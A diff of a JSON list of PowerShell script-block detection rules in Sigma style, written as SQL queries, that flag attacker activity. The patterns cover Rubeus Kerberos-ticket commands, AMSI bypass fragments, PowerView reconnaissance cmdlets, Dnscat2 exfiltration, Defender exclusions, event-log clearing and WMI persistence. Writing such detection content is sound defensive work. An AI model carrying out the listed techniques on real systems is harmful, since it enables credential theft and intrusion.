"filename": "posh_ps_dump_password_windows_credential_manager.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "Powershell Directory Enumeration", - "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "status": "test", - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", - "author": "frack113", + "title": "Suspicious Eventlog Clear", + "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "status": "experimental", + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.defense_evasion", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_directory_enum.yml" + "filename": "posh_ps_susp_clear_eventlog.yml" }, { - "title": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", - "id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "title": "Suspicious Invoke-Item From Mount-DiskImage", + "id": "902cedee-0398-4e3a-8183-6f3a89773a96", "status": "test", - "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1201" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdDefaultDomainPasswordPolicy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + "filename": "posh_ps_run_from_mount_diskimage.yml" }, { - "title": "Suspicious PowerShell WindowStyle Option", - "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "title": "Manipulation of User Computer or Group Security Principals Across AD", + "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "status": "test", - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "author": "frack113, Tim Shelton (fp AWS)", + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.003" + "attack.persistence", + "attack.t1136.002" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_windowstyle.yml" + "filename": "posh_ps_directoryservices_accountmanagement.yml" }, { - "title": "Get-ADUser Enumeration Using UserAccountControl Flags", - "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", "status": "test", - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "author": "frack113", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "posh_ps_as_rep_roasting.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Powershell Detect Virtualization Environment", - "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "title": "Remove Account From Domain Admin Group", + "id": "48a45d45-8112-416b-8a67-46e03a4b2107", "status": "test", - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "author": "frack113, Duc.Le-GTSC", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1497.001" + "attack.impact", + "attack.t1531" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" ], - "filename": "posh_ps_detect_vm_env.yml" + "filename": "posh_ps_susp_remove_adgroupmember.yml" }, { - "title": "Potential PowerShell Obfuscation Using Alias Cmdlets", - "id": "96cd126d-f970-49c4-848a-da3a09f55c55", + "title": "Suspicious GetTypeFromCLSID ShellExecute", + "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", "status": "experimental", - "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", + "description": "Detects suspicious Powershell code that execute COM Objects", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1027", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Set-Alias %' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Alias %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_set_alias.yml" + "filename": "posh_ps_susp_gettypefromclsid.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "title": "Active Directory Group Enumeration With Get-AdGroup", + "id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.discovery", + "attack.t1069.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdGroup %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_ps_get_adgroup.yml" }, { - "title": "Suspicious Get-WmiObject", - "id": "0332a266-b584-47b4-933d-a00b103e1b37", + "title": "Suspicious X509Enrollment - Ps Script", + "id": "504d63cb-0dba-4d02-8531-e72981aace2c", "status": "experimental", - "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "description": "Detect use of X509Enrollment", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1546" - ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate administrative script" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND NOT ((Path LIKE '%\\\\CL\\_Utility.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%function Get-FreeSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%SELECT % FROM Win32\\_LogicalDisk WHERE MediaType=12%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_gwmi.yml" + "filename": "posh_ps_x509enrollment.yml" }, { - "title": "Remove Account From Domain Admin Group", - "id": "48a45d45-8112-416b-8a67-46e03a4b2107", - "status": "test", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", - "author": "frack113", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1531" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_remove_adgroupmember.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "title": "Windows Defender Exclusions Added - PowerShell", + "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration" + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_ps_win_defender_exclusions_added.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level - PowerShell", - "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "status": "experimental", - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "title": "Powershell WMI Persistence", + "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "status": "test", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Administrator script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml" + "filename": "posh_ps_wmi_persistence.yml" }, { - "title": "PowerShell Write-EventLog Usage", - "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", - "status": "experimental", - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADReplAccount", + "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "status": "test", + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_write_eventlog.yml" + "filename": "posh_ps_get_adreplaccount.yml" }, { - "title": "PowerShell Create Local User", - "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "title": "Suspicious Unblock-File", + "id": "5947497f-1aa4-41dd-9693-c9848d58727d", "status": "test", - "description": "Detects creation of a local user via PowerShell", - "author": "@ROxPinTeddy", + "description": "Remove the 